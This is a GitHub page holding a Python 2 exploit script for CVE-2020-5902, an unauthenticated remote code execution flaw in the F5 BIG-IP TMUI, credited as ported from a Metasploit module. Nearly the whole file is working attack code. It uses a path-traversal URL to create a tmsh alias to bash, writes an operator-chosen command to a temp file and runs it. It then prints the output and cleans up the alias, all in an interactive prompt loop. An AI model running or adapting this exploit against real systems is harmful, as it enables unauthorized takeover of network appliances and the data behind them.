-
Notifications
You must be signed in to change notification settings - Fork 112
/
CVE-2020-5902.py
109 lines (92 loc) · 4.89 KB
/
CVE-2020-5902.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
#coding:utf-8
import requests
import json
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
import uuid
import sys
# tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
# fileSave.jsp?fileName=/tmp/cmd&content=id
# tmshCmd.jsp?command=list+/tmp/cmd
# tmshCmd.jsp?command=delete+cli+alias+private+list
banner = r'''
_______ _______ ______ _________ _______ _________ _______ _______ _______ _______
( ____ \( ____ \ ( ___ \ \__ __/( ____ \ \__ __/( ____ ) ( ____ )( ____ \( ____ \
| ( \/| ( \/ | ( ) ) ) ( | ( \/ ) ( | ( )| | ( )|| ( \/| ( \/
| (__ | (____ | (__/ / | | | | | | | (____)| | (____)|| | | (__
| __) (_____ \ | __ ( | | | | ____ | | | _____) | __)| | | __)
| ( ) ) | ( \ \ | | | | \_ ) | | | ( | (\ ( | | | (
| ) /\____) ) | )___) )___) (___| (___) | ___) (___| ) | ) \ \__| (____/\| (____/\
|/ \______/ |/ \___/ \_______/(_______) \_______/|/ |/ \__/(_______/(_______/
CVE-2020-5902 UnAuth RCE Vuln
Python By Jas502n
From: https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
____________________________________________________________________________________________________________________________________________________
'''
def tmshCmd_exit(url,file,cmd):
tmshCmd_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"
proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
r = requests.get(tmshCmd_url,verify=False,allow_redirects=False)
# r = requests.get(tmshCmd_url,verify=False,allow_redirects=False,proxies=proxies)
response_str = json.dumps(r.headers.__dict__['_store'])
# print type(response_str)
# print response_str
if r.status_code == 200 and 'tmui' in response_str:
# print tmshCmd_url
print "[+] tmshCmd.jsp Exit!"
print "[+] create cli alias private list command bash \n"
# cmd = 'whoami'
upload_exit(url,file,cmd)
else:
print "[+] tmshCmd.jsp No Exit!\n"
def upload_exit(url,file,cmd):
fileSave_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/%s&content="%file + cmd
proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
r = requests.get(fileSave_url,verify=False,allow_redirects=False)
# r = requests.get(fileSave_url,verify=False,allow_redirects=False,proxies=proxies)
response_str = json.dumps(r.headers.__dict__['_store'])
if r.status_code == 200 and 'tmui' in response_str:
# print fileSave_url
print "[+] fileSave.jsp Exit!\n"
list_command(url,file)
else:
print "[+] fileSave.jsp No Exit!\n"
def list_command(url,file):
rce_url = url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/%s" % file
proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
r = requests.get(rce_url,verify=False,allow_redirects=False)
# r = requests.get(rce_url,verify=False,allow_redirects=False,proxies=proxies)
response_str = json.dumps(r.headers.__dict__['_store'])
# print len(r.content)
if r.status_code == 200 and 'tmui' in response_str:
if len(r.content) > 33:
# print rce_url
print "[+] Command Successfull !\n"
command_result = json.loads(r.content)
print "_"*90,'\n\n'
print command_result['output']
print "_"*90,"\n\n"
delete_list(url)
else:
print "[+] Command Failed !\n"
def delete_list(url):
delete_url = url + '/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=delete+cli+alias+private+list'
proxies = {"http":"http://127.0.0.1:8080","https":"https://127.0.0.1:8080"}
r = requests.get(delete_url,verify=False,allow_redirects=False)
# r = requests.get(delete_url,verify=False,allow_redirects=False,proxies=proxies)
response_str = json.dumps(r.headers.__dict__['_store'])
if r.status_code == 200 and 'tmui' in response_str:
# print delete_url
print "[+] delete cli alias private list Successfull! \n"
else:
print "[+] delete cli alias private list Failed! \n"
if __name__ == '__main__':
print banner
while 1:
url = "https://x.x.x.x/"
# url = sys.argv[1]
file = str(uuid.uuid1())
print "/tmp/" + file,"\n"
cmd = raw_input("[+]Set Cmd= ")
print
tmshCmd_exit(url,file,cmd)